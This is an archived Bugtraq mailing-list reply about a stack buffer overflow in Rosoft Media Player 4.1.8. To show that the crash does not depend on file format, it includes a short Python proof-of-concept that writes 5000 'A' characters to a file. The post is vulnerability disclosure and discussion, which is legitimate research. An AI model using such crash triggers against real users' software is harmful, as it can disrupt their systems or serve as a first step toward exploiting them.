Re: Re: Rosoft Media Player 4.1.8 RML Stack Based Buffer Overflow

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Re: Re: Rosoft Media Player 4.1.8 RML Stack Based Buffer Overflow
From: opexoc@xxxxxxxxx
Date: 17 Mar 2008 23:27:31 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

>> I know this because I "tasted" the exploit without extension.

Actually, this is not the proof that the vulnerability is not connected with 
format, because program could read the file and judge that if this program has 
M3U format or RML or something else. But if we try following code we are sure:

#!/usr/bin/python
content = (
"A" * 5000 + "\n"
)

fd = open("music","w");
fd.write(content)
fd.close();
print "FILE CREATED" 

Wiktor

Prev by Date: Re: Re: Rosoft Media Player 4.1.8 RML Stack Based Buffer Overflow
Next by Date: [SECURITY] [DSA 1522-1] New unzip packages fix potential code execution
Previous by thread: Re: Re: Rosoft Media Player 4.1.8 RML Stack Based Buffer Overflow
Next by thread: XNview 1.92.1 Long Filename Overflow
Index(es):
- Date
- Thread